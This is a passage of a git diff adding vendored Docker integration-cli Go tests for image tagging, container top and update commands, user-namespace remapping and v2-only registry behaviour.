d.checkServiceTasksInState("top", swarm.TaskStatePending, "missing plugin on 1 node"), checker.Equals, 1) + + plugin := newVolumePlugin(c, "customvolumedriver") + defer plugin.Close() + + // create a dummy volume to trigger lazy loading of the plugin + out, err = d.Cmd("volume", "create", "-d", "customvolumedriver", "hello") + + // TODO(aaronl): It will take about 15 seconds for swarm to realize the + // plugin was loaded. Switching the test over to plugin v2 would avoid + // this long delay. + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + out, err = d.Cmd("ps", "-q") + c.Assert(err, checker.IsNil) + containerID := strings.TrimSpace(out) + + out, err = d.Cmd("inspect", "-f", "{{json .Mounts}}", containerID) + c.Assert(err, checker.IsNil) + + var mounts []struct { + Name string + Driver string + } + + c.Assert(json.NewDecoder(strings.NewReader(out)).Decode(&mounts), checker.IsNil) + c.Assert(len(mounts), checker.Equals, 1, check.Commentf(out)) + c.Assert(mounts[0].Name, checker.Equals, "my-volume") + c.Assert(mounts[0].Driver, checker.Equals, "customvolumedriver") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go new file mode 100644 index 0000000000..b7d2b1dfe6 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go @@ -0,0 +1,225 @@ +package main + +import ( + "fmt" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/stringutils" + "github.com/go-check/check" +) + +// tagging a named image in a new unprefixed repo should work +func (s *DockerSuite) TestTagUnprefixedRepoByName(c *check.C) { + // Don't attempt to pull on Windows as not in hub. 
It's installed + // as an image through .ensure-frozen-images-windows + if daemonPlatform != "windows" { + if err := pullImageIfNotExist("busybox:latest"); err != nil { + c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") + } + } + + dockerCmd(c, "tag", "busybox:latest", "testfoobarbaz") +} + +// tagging an image by ID in a new unprefixed repo should work +func (s *DockerSuite) TestTagUnprefixedRepoByID(c *check.C) { + imageID := inspectField(c, "busybox", "Id") + dockerCmd(c, "tag", imageID, "testfoobarbaz") +} + +// ensure we don't allow the use of invalid repository names; these tag operations should fail +func (s *DockerSuite) TestTagInvalidUnprefixedRepo(c *check.C) { + invalidRepos := []string{"fo$z$", "Foo@3cc", "Foo$3", "Foo*3", "Fo^3", "Foo!3", "F)xcz(", "fo%asd", "FOO/bar"} + + for _, repo := range invalidRepos { + out, _, err := dockerCmdWithError("tag", "busybox", repo) + c.Assert(err, checker.NotNil, check.Commentf("tag busybox %v should have failed : %v", repo, out)) + } +} + +// ensure we don't allow the use of invalid tags; these tag operations should fail +func (s *DockerSuite) TestTagInvalidPrefixedRepo(c *check.C) { + longTag := stringutils.GenerateRandomAlphaOnlyString(121) + + invalidTags := []string{"repo:fo$z$", "repo:Foo@3cc", "repo:Foo$3", "repo:Foo*3", "repo:Fo^3", "repo:Foo!3", "repo:%goodbye", "repo:#hashtagit", "repo:F)xcz(", "repo:-foo", "repo:..", longTag} + + for _, repotag := range invalidTags { + out, _, err := dockerCmdWithError("tag", "busybox", repotag) + c.Assert(err, checker.NotNil, check.Commentf("tag busybox %v should have failed : %v", repotag, out)) + } +} + +// ensure we allow the use of valid tags +func (s *DockerSuite) TestTagValidPrefixedRepo(c *check.C) { + // Don't attempt to pull on Windows as not in hub. 
It's installed + // as an image through .ensure-frozen-images-windows + if daemonPlatform != "windows" { + if err := pullImageIfNotExist("busybox:latest"); err != nil { + c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") + } + } + + validRepos := []string{"fooo/bar", "fooaa/test", "foooo:t", "HOSTNAME.DOMAIN.COM:443/foo/bar"} + + for _, repo := range validRepos { + _, _, err := dockerCmdWithError("tag", "busybox:latest", repo) + if err != nil { + c.Errorf("tag busybox %v should have worked: %s", repo, err) + continue + } + deleteImages(repo) + } +} + +// tag an image with an existed tag name without -f option should work +func (s *DockerSuite) TestTagExistedNameWithoutForce(c *check.C) { + // Don't attempt to pull on Windows as not in hub. It's installed + // as an image through .ensure-frozen-images-windows + if daemonPlatform != "windows" { + if err := pullImageIfNotExist("busybox:latest"); err != nil { + c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") + } + } + + dockerCmd(c, "tag", "busybox:latest", "busybox:test") +} + +func (s *DockerSuite) TestTagWithPrefixHyphen(c *check.C) { + // Don't attempt to pull on Windows as not in hub. 
It's installed + // as an image through .ensure-frozen-images-windows + if daemonPlatform != "windows" { + if err := pullImageIfNotExist("busybox:latest"); err != nil { + c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") + } + } + // test repository name begin with '-' + out, _, err := dockerCmdWithError("tag", "busybox:latest", "-busybox:test") + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Error parsing reference", check.Commentf("tag a name begin with '-' should failed")) + + // test namespace name begin with '-' + out, _, err = dockerCmdWithError("tag", "busybox:latest", "-test/busybox:test") + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Error parsing reference", check.Commentf("tag a name begin with '-' should failed")) + + // test index name begin with '-' + out, _, err = dockerCmdWithError("tag", "busybox:latest", "-index:5000/busybox:test") + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Error parsing reference", check.Commentf("tag a name begin with '-' should failed")) +} + +// ensure tagging using official names works +// ensure all tags result in the same name +func (s *DockerSuite) TestTagOfficialNames(c *check.C) { + names := []string{ + "docker.io/busybox", + "index.docker.io/busybox", + "library/busybox", + "docker.io/library/busybox", + "index.docker.io/library/busybox", + } + + for _, name := range names { + out, exitCode, err := dockerCmdWithError("tag", "busybox:latest", name+":latest") + if err != nil || exitCode != 0 { + c.Errorf("tag busybox %v should have worked: %s, %s", name, err, out) + continue + } + + // ensure we don't have multiple tag names. 
+ out, _, err = dockerCmdWithError("images") + if err != nil { + c.Errorf("listing images failed with errors: %v, %s", err, out) + } else if strings.Contains(out, name) { + c.Errorf("images should not have listed '%s'", name) + deleteImages(name + ":latest") + } + } + + for _, name := range names { + _, exitCode, err := dockerCmdWithError("tag", name+":latest", "fooo/bar:latest") + if err != nil || exitCode != 0 { + c.Errorf("tag %v fooo/bar should have worked: %s", name, err) + continue + } + deleteImages("fooo/bar:latest") + } +} + +// ensure tags can not match digests +func (s *DockerSuite) TestTagMatchesDigest(c *check.C) { + // Don't attempt to pull on Windows as not in hub. It's installed + // as an image through .ensure-frozen-images-windows + if daemonPlatform != "windows" { + if err := pullImageIfNotExist("busybox:latest"); err != nil { + c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") + } + } + digest := "busybox@sha256:abcdef76720241213f5303bda7704ec4c2ef75613173910a56fb1b6e20251507" + // test setting tag fails + _, _, err := dockerCmdWithError("tag", "busybox:latest", digest) + if err == nil { + c.Fatal("digest tag a name should have failed") + } + // check that no new image matches the digest + _, _, err = dockerCmdWithError("inspect", digest) + if err == nil { + c.Fatal("inspecting by digest should have failed") + } +} + +func (s *DockerSuite) TestTagInvalidRepoName(c *check.C) { + // Don't attempt to pull on Windows as not in hub. 
It's installed + // as an image through .ensure-frozen-images-windows + if daemonPlatform != "windows" { + if err := pullImageIfNotExist("busybox:latest"); err != nil { + c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") + } + } + + // test setting tag fails + _, _, err := dockerCmdWithError("tag", "busybox:latest", "sha256:sometag") + if err == nil { + c.Fatal("tagging with image named \"sha256\" should have failed") + } +} + +// ensure tags cannot create ambiguity with image ids +func (s *DockerSuite) TestTagTruncationAmbiguity(c *check.C) { + //testRequires(c, DaemonIsLinux) + // Don't attempt to pull on Windows as not in hub. It's installed + // as an image through .ensure-frozen-images-windows + if daemonPlatform != "windows" { + if err := pullImageIfNotExist("busybox:latest"); err != nil { + c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") + } + } + imageID, err := buildImage("notbusybox:latest", + `FROM busybox + MAINTAINER dockerio`, + true) + if err != nil { + c.Fatal(err) + } + truncatedImageID := stringid.TruncateID(imageID) + truncatedTag := fmt.Sprintf("notbusybox:%s", truncatedImageID) + + id := inspectField(c, truncatedTag, "Id") + + // Ensure inspect by image id returns image for image id + c.Assert(id, checker.Equals, imageID) + c.Logf("Built image: %s", imageID) + + // test setting tag fails + _, _, err = dockerCmdWithError("tag", "busybox:latest", truncatedTag) + if err != nil { + c.Fatalf("Error tagging with an image id: %s", err) + } + + id = inspectField(c, truncatedTag, "Id") + + // Ensure id is imageID and not busybox:latest + c.Assert(id, checker.Not(checker.Equals), imageID) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go new file mode 100644 index 0000000000..caae29024a --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go @@ -0,0 
+1,73 @@ +package main + +import ( + "strings" + + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestTopMultipleArgs(c *check.C) { + out, _ := runSleepingContainer(c, "-d") + cleanedContainerID := strings.TrimSpace(out) + + var expected icmd.Expected + switch daemonPlatform { + case "windows": + expected = icmd.Expected{ExitCode: 1, Err: "Windows does not support arguments to top"} + default: + expected = icmd.Expected{Out: "PID"} + } + result := dockerCmdWithResult("top", cleanedContainerID, "-o", "pid") + c.Assert(result, icmd.Matches, expected) +} + +func (s *DockerSuite) TestTopNonPrivileged(c *check.C) { + out, _ := runSleepingContainer(c, "-d") + cleanedContainerID := strings.TrimSpace(out) + + out1, _ := dockerCmd(c, "top", cleanedContainerID) + out2, _ := dockerCmd(c, "top", cleanedContainerID) + dockerCmd(c, "kill", cleanedContainerID) + + // Windows will list the name of the launched executable which in this case is busybox.exe, without the parameters. + // Linux will display the command executed in the container + var lookingFor string + if daemonPlatform == "windows" { + lookingFor = "busybox.exe" + } else { + lookingFor = "top" + } + + c.Assert(out1, checker.Contains, lookingFor, check.Commentf("top should've listed `%s` in the process list, but failed the first time", lookingFor)) + c.Assert(out2, checker.Contains, lookingFor, check.Commentf("top should've listed `%s` in the process list, but failed the second time", lookingFor)) +} + +// TestTopWindowsCoreProcesses validates that there are lines for the critical +// processes which are found in a Windows container. Note Windows is architecturally +// very different to Linux in this regard. 
+func (s *DockerSuite) TestTopWindowsCoreProcesses(c *check.C) { + testRequires(c, DaemonIsWindows) + out, _ := runSleepingContainer(c, "-d") + cleanedContainerID := strings.TrimSpace(out) + out1, _ := dockerCmd(c, "top", cleanedContainerID) + lookingFor := []string{"smss.exe", "csrss.exe", "wininit.exe", "services.exe", "lsass.exe", "CExecSvc.exe"} + for i, s := range lookingFor { + c.Assert(out1, checker.Contains, s, check.Commentf("top should've listed `%s` in the process list, but failed. Test case %d", s, i)) + } +} + +func (s *DockerSuite) TestTopPrivileged(c *check.C) { + // Windows does not support --privileged + testRequires(c, DaemonIsLinux, NotUserNamespace) + out, _ := dockerCmd(c, "run", "--privileged", "-i", "-d", "busybox", "top") + cleanedContainerID := strings.TrimSpace(out) + + out1, _ := dockerCmd(c, "top", cleanedContainerID) + out2, _ := dockerCmd(c, "top", cleanedContainerID) + dockerCmd(c, "kill", cleanedContainerID) + + c.Assert(out1, checker.Contains, "top", check.Commentf("top should've listed `top` in the process list, but failed the first time")) + c.Assert(out2, checker.Contains, "top", check.Commentf("top should've listed `top` in the process list, but failed the second time")) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go new file mode 100644 index 0000000000..0b31bb45ff --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go @@ -0,0 +1,41 @@ +package main + +import ( + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestUpdateRestartPolicy(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "--restart=on-failure:3", "busybox", "sh", "-c", "sleep 1 && false") + timeout := 60 * time.Second + if daemonPlatform == "windows" { + timeout = 180 * time.Second + } + + id := strings.TrimSpace(string(out)) 
+ + // update restart policy to on-failure:5 + dockerCmd(c, "update", "--restart=on-failure:5", id) + + err := waitExited(id, timeout) + c.Assert(err, checker.IsNil) + + count := inspectField(c, id, "RestartCount") + c.Assert(count, checker.Equals, "5") + + maximumRetryCount := inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount") + c.Assert(maximumRetryCount, checker.Equals, "5") +} + +func (s *DockerSuite) TestUpdateRestartWithAutoRemoveFlag(c *check.C) { + out, _ := runSleepingContainer(c, "--rm") + id := strings.TrimSpace(out) + + // update restart policy for an AutoRemove container + out, _, err := dockerCmdWithError("update", "--restart=always", id) + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "Restart policy cannot be updated because AutoRemove is enabled for the container") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go new file mode 100644 index 0000000000..580ff02602 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go @@ -0,0 +1,283 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "fmt" + "github.com/kr/pty" + "os/exec" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/parsers/kernel" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestUpdateRunningContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + + name := "test-update-container" + dockerCmd(c, "run", "-d", "--name", name, "-m", "300M", "busybox", "top") + dockerCmd(c, "update", "-m", "500M", name) + + c.Assert(inspectField(c, name, "HostConfig.Memory"), checker.Equals, "524288000") + + file := "/sys/fs/cgroup/memory/memory.limit_in_bytes" + out, _ := dockerCmd(c, "exec", name, "cat", file) + c.Assert(strings.TrimSpace(out), 
checker.Equals, "524288000") +} + +func (s *DockerSuite) TestUpdateRunningContainerWithRestart(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + + name := "test-update-container" + dockerCmd(c, "run", "-d", "--name", name, "-m", "300M", "busybox", "top") + dockerCmd(c, "update", "-m", "500M", name) + dockerCmd(c, "restart", name) + + c.Assert(inspectField(c, name, "HostConfig.Memory"), checker.Equals, "524288000") + + file := "/sys/fs/cgroup/memory/memory.limit_in_bytes" + out, _ := dockerCmd(c, "exec", name, "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "524288000") +} + +func (s *DockerSuite) TestUpdateStoppedContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + + name := "test-update-container" + file := "/sys/fs/cgroup/memory/memory.limit_in_bytes" + dockerCmd(c, "run", "--name", name, "-m", "300M", "busybox", "cat", file) + dockerCmd(c, "update", "-m", "500M", name) + + c.Assert(inspectField(c, name, "HostConfig.Memory"), checker.Equals, "524288000") + + out, _ := dockerCmd(c, "start", "-a", name) + c.Assert(strings.TrimSpace(out), checker.Equals, "524288000") +} + +func (s *DockerSuite) TestUpdatePausedContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, cpuShare) + + name := "test-update-container" + dockerCmd(c, "run", "-d", "--name", name, "--cpu-shares", "1000", "busybox", "top") + dockerCmd(c, "pause", name) + dockerCmd(c, "update", "--cpu-shares", "500", name) + + c.Assert(inspectField(c, name, "HostConfig.CPUShares"), checker.Equals, "500") + + dockerCmd(c, "unpause", name) + file := "/sys/fs/cgroup/cpu/cpu.shares" + out, _ := dockerCmd(c, "exec", name, "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "500") +} + +func (s *DockerSuite) TestUpdateWithUntouchedFields(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + testRequires(c, cpuShare) + + name := "test-update-container" + 
dockerCmd(c, "run", "-d", "--name", name, "-m", "300M", "--cpu-shares", "800", "busybox", "top") + dockerCmd(c, "update", "-m", "500M", name) + + // Update memory and not touch cpus, `cpuset.cpus` should still have the old value + out := inspectField(c, name, "HostConfig.CPUShares") + c.Assert(out, check.Equals, "800") + + file := "/sys/fs/cgroup/cpu/cpu.shares" + out, _ = dockerCmd(c, "exec", name, "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "800") +} + +func (s *DockerSuite) TestUpdateContainerInvalidValue(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + + name := "test-update-container" + dockerCmd(c, "run", "-d", "--name", name, "-m", "300M", "busybox", "true") + out, _, err := dockerCmdWithError("update", "-m", "2M", name) + c.Assert(err, check.NotNil) + expected := "Minimum memory limit allowed is 4MB" + c.Assert(out, checker.Contains, expected) +} + +func (s *DockerSuite) TestUpdateContainerWithoutFlags(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + + name := "test-update-container" + dockerCmd(c, "run", "-d", "--name", name, "-m", "300M", "busybox", "true") + _, _, err := dockerCmdWithError("update", name) + c.Assert(err, check.NotNil) +} + +func (s *DockerSuite) TestUpdateKernelMemory(c *check.C) { + testRequires(c, DaemonIsLinux, kernelMemorySupport) + + name := "test-update-container" + dockerCmd(c, "run", "-d", "--name", name, "--kernel-memory", "50M", "busybox", "top") + dockerCmd(c, "update", "--kernel-memory", "100M", name) + + c.Assert(inspectField(c, name, "HostConfig.KernelMemory"), checker.Equals, "104857600") + + file := "/sys/fs/cgroup/memory/memory.kmem.limit_in_bytes" + out, _ := dockerCmd(c, "exec", name, "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "104857600") +} + +func (s *DockerSuite) TestUpdateKernelMemoryUninitialized(c *check.C) { + testRequires(c, DaemonIsLinux, kernelMemorySupport) + + isNewKernel := 
kernel.CheckKernelVersion(4, 6, 0) + name := "test-update-container" + dockerCmd(c, "run", "-d", "--name", name, "busybox", "top") + _, _, err := dockerCmdWithError("update", "--kernel-memory", "100M", name) + // Update kernel memory to a running container without kernel memory initialized + // is not allowed before kernel version 4.6. + if !isNewKernel { + c.Assert(err, check.NotNil) + } else { + c.Assert(err, check.IsNil) + } + + dockerCmd(c, "pause", name) + _, _, err = dockerCmdWithError("update", "--kernel-memory", "200M", name) + if !isNewKernel { + c.Assert(err, check.NotNil) + } else { + c.Assert(err, check.IsNil) + } + dockerCmd(c, "unpause", name) + + dockerCmd(c, "stop", name) + dockerCmd(c, "update", "--kernel-memory", "300M", name) + dockerCmd(c, "start", name) + + c.Assert(inspectField(c, name, "HostConfig.KernelMemory"), checker.Equals, "314572800") + + file := "/sys/fs/cgroup/memory/memory.kmem.limit_in_bytes" + out, _ := dockerCmd(c, "exec", name, "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "314572800") +} + +func (s *DockerSuite) TestUpdateSwapMemoryOnly(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + testRequires(c, swapMemorySupport) + + name := "test-update-container" + dockerCmd(c, "run", "-d", "--name", name, "--memory", "300M", "--memory-swap", "500M", "busybox", "top") + dockerCmd(c, "update", "--memory-swap", "600M", name) + + c.Assert(inspectField(c, name, "HostConfig.MemorySwap"), checker.Equals, "629145600") + + file := "/sys/fs/cgroup/memory/memory.memsw.limit_in_bytes" + out, _ := dockerCmd(c, "exec", name, "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "629145600") +} + +func (s *DockerSuite) TestUpdateInvalidSwapMemory(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + testRequires(c, swapMemorySupport) + + name := "test-update-container" + dockerCmd(c, "run", "-d", "--name", name, "--memory", "300M", "--memory-swap", 
"500M", "busybox", "top") + _, _, err := dockerCmdWithError("update", "--memory-swap", "200M", name) + // Update invalid swap memory should fail. + // This will pass docker config validation, but failed at kernel validation + c.Assert(err, check.NotNil) + + // Update invalid swap memory with failure should not change HostConfig + c.Assert(inspectField(c, name, "HostConfig.Memory"), checker.Equals, "314572800") + c.Assert(inspectField(c, name, "HostConfig.MemorySwap"), checker.Equals, "524288000") + + dockerCmd(c, "update", "--memory-swap", "600M", name) + + c.Assert(inspectField(c, name, "HostConfig.MemorySwap"), checker.Equals, "629145600") + + file := "/sys/fs/cgroup/memory/memory.memsw.limit_in_bytes" + out, _ := dockerCmd(c, "exec", name, "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "629145600") +} + +func (s *DockerSuite) TestUpdateStats(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + testRequires(c, cpuCfsQuota) + name := "foo" + dockerCmd(c, "run", "-d", "-ti", "--name", name, "-m", "500m", "busybox") + + c.Assert(waitRun(name), checker.IsNil) + + getMemLimit := func(id string) uint64 { + resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id), nil, "") + c.Assert(err, checker.IsNil) + c.Assert(resp.Header.Get("Content-Type"), checker.Equals, "application/json") + + var v *types.Stats + err = json.NewDecoder(body).Decode(&v) + c.Assert(err, checker.IsNil) + body.Close() + + return v.MemoryStats.Limit + } + preMemLimit := getMemLimit(name) + + dockerCmd(c, "update", "--cpu-quota", "2000", name) + + curMemLimit := getMemLimit(name) + + c.Assert(preMemLimit, checker.Equals, curMemLimit) + +} + +func (s *DockerSuite) TestUpdateMemoryWithSwapMemory(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + testRequires(c, swapMemorySupport) + + name := "test-update-container" + dockerCmd(c, "run", "-d", "--name", name, "--memory", "300M", 
"busybox", "top") + out, _, err := dockerCmdWithError("update", "--memory", "800M", name) + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "Memory limit should be smaller than already set memoryswap limit") + + dockerCmd(c, "update", "--memory", "800M", "--memory-swap", "1000M", name) +} + +func (s *DockerSuite) TestUpdateNotAffectMonitorRestartPolicy(c *check.C) { + testRequires(c, DaemonIsLinux, cpuShare) + + out, _ := dockerCmd(c, "run", "-tid", "--restart=always", "busybox", "sh") + id := strings.TrimSpace(string(out)) + dockerCmd(c, "update", "--cpu-shares", "512", id) + + cpty, tty, err := pty.Open() + c.Assert(err, checker.IsNil) + defer cpty.Close() + + cmd := exec.Command(dockerBinary, "attach", id) + cmd.Stdin = tty + + c.Assert(cmd.Start(), checker.IsNil) + defer cmd.Process.Kill() + + _, err = cpty.Write([]byte("exit\n")) + c.Assert(err, checker.IsNil) + + c.Assert(cmd.Wait(), checker.IsNil) + + // container should restart again and keep running + err = waitInspect(id, "{{.RestartCount}}", "1", 30*time.Second) + c.Assert(err, checker.IsNil) + c.Assert(waitRun(id), checker.IsNil) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go new file mode 100644 index 0000000000..acf74238b2 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go @@ -0,0 +1,98 @@ +// +build !windows + +package main + +import ( + "fmt" + "io/ioutil" + "os" + "os/exec" + "path" + "path/filepath" + "strconv" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/system" + "github.com/go-check/check" +) + +// user namespaces test: run daemon with remapped root setting +// 1. validate uid/gid maps are set properly +// 2. 
verify that files created are owned by remapped root +func (s *DockerDaemonSuite) TestDaemonUserNamespaceRootSetting(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon, UserNamespaceInKernel) + + c.Assert(s.d.StartWithBusybox("--userns-remap", "default"), checker.IsNil) + + tmpDir, err := ioutil.TempDir("", "userns") + c.Assert(err, checker.IsNil) + + defer os.RemoveAll(tmpDir) + + // Set a non-existent path + tmpDirNotExists := path.Join(os.TempDir(), "userns"+stringid.GenerateRandomID()) + defer os.RemoveAll(tmpDirNotExists) + + // we need to find the uid and gid of the remapped root from the daemon's root dir info + uidgid := strings.Split(filepath.Base(s.d.root), ".") + c.Assert(uidgid, checker.HasLen, 2, check.Commentf("Should have gotten uid/gid strings from root dirname: %s", filepath.Base(s.d.root))) + uid, err := strconv.Atoi(uidgid[0]) + c.Assert(err, checker.IsNil, check.Commentf("Can't parse uid")) + gid, err := strconv.Atoi(uidgid[1]) + c.Assert(err, checker.IsNil, check.Commentf("Can't parse gid")) + + // writable by the remapped root UID/GID pair + c.Assert(os.Chown(tmpDir, uid, gid), checker.IsNil) + + out, err := s.d.Cmd("run", "-d", "--name", "userns", "-v", tmpDir+":/goofy", "-v", tmpDirNotExists+":/donald", "busybox", "sh", "-c", "touch /goofy/testfile; top") + c.Assert(err, checker.IsNil, check.Commentf("Output: %s", out)) + user := s.findUser(c, "userns") + c.Assert(uidgid[0], checker.Equals, user) + + // check that the created directory is owned by remapped uid:gid + statNotExists, err := system.Stat(tmpDirNotExists) + c.Assert(err, checker.IsNil) + c.Assert(statNotExists.UID(), checker.Equals, uint32(uid), check.Commentf("Created directory not owned by remapped root UID")) + c.Assert(statNotExists.GID(), checker.Equals, uint32(gid), check.Commentf("Created directory not owned by remapped root GID")) + + pid, err := s.d.Cmd("inspect", "--format={{.State.Pid}}", "userns") + c.Assert(err, checker.IsNil, check.Commentf("Could not 
inspect running container: out: %q", pid)) + // check the uid and gid maps for the PID to ensure root is remapped + // (cmd = cat /proc//uid_map | grep -E '0\s+9999\s+1') + out, rc1, err := runCommandPipelineWithOutput( + exec.Command("cat", "/proc/"+strings.TrimSpace(pid)+"/uid_map"), + exec.Command("grep", "-E", fmt.Sprintf("0[[:space:]]+%d[[:space:]]+", uid))) + c.Assert(rc1, checker.Equals, 0, check.Commentf("Didn't match uid_map: output: %s", out)) + + out, rc2, err := runCommandPipelineWithOutput( + exec.Command("cat", "/proc/"+strings.TrimSpace(pid)+"/gid_map"), + exec.Command("grep", "-E", fmt.Sprintf("0[[:space:]]+%d[[:space:]]+", gid))) + c.Assert(rc2, checker.Equals, 0, check.Commentf("Didn't match gid_map: output: %s", out)) + + // check that the touched file is owned by remapped uid:gid + stat, err := system.Stat(filepath.Join(tmpDir, "testfile")) + c.Assert(err, checker.IsNil) + c.Assert(stat.UID(), checker.Equals, uint32(uid), check.Commentf("Touched file not owned by remapped root UID")) + c.Assert(stat.GID(), checker.Equals, uint32(gid), check.Commentf("Touched file not owned by remapped root GID")) + + // use host usernamespace + out, err = s.d.Cmd("run", "-d", "--name", "userns_skip", "--userns", "host", "busybox", "sh", "-c", "touch /goofy/testfile; top") + c.Assert(err, checker.IsNil, check.Commentf("Output: %s", out)) + user = s.findUser(c, "userns_skip") + // userns are skipped, user is root + c.Assert(user, checker.Equals, "root") +} + +// findUser finds the uid or name of the user of the first process that runs in a container +func (s *DockerDaemonSuite) findUser(c *check.C, container string) string { + out, err := s.d.Cmd("top", container) + c.Assert(err, checker.IsNil, check.Commentf("Output: %s", out)) + rows := strings.Split(out, "\n") + if len(rows) < 2 { + // No process rows founds + c.FailNow() + } + return strings.Fields(rows[1])[0] +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go 
b/vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go new file mode 100644 index 0000000000..889936a062 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go @@ -0,0 +1,125 @@ +package main + +import ( + "fmt" + "io/ioutil" + "net/http" + "os" + + "github.com/go-check/check" +) + +func makefile(contents string) (string, func(), error) { + cleanup := func() { + + } + + f, err := ioutil.TempFile(".", "tmp") + if err != nil { + return "", cleanup, err + } + err = ioutil.WriteFile(f.Name(), []byte(contents), os.ModePerm) + if err != nil { + return "", cleanup, err + } + + cleanup = func() { + err := os.Remove(f.Name()) + if err != nil { + fmt.Println("Error removing tmpfile") + } + } + return f.Name(), cleanup, nil + +} + +// TestV2Only ensures that a daemon in v2-only mode does not +// attempt to contact any v1 registry endpoints. +func (s *DockerRegistrySuite) TestV2Only(c *check.C) { + reg, err := newTestRegistry(c) + c.Assert(err, check.IsNil) + + reg.registerHandler("/v2/", func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(404) + }) + + reg.registerHandler("/v1/.*", func(w http.ResponseWriter, r *http.Request) { + c.Fatal("V1 registry contacted") + }) + + repoName := fmt.Sprintf("%s/busybox", reg.hostport) + + err = s.d.Start("--insecure-registry", reg.hostport, "--disable-legacy-registry=true") + c.Assert(err, check.IsNil) + + dockerfileName, cleanup, err := makefile(fmt.Sprintf("FROM %s/busybox", reg.hostport)) + c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile")) + defer cleanup() + + s.d.Cmd("build", "--file", dockerfileName, ".") + + s.d.Cmd("run", repoName) + s.d.Cmd("login", "-u", "richard", "-p", "testtest", "-e", "testuser@testdomain.com", reg.hostport) + s.d.Cmd("tag", "busybox", repoName) + s.d.Cmd("push", repoName) + s.d.Cmd("pull", repoName) +} + +// TestV1 starts a daemon in 'normal' mode +// and ensure v1 endpoints are hit for the following 
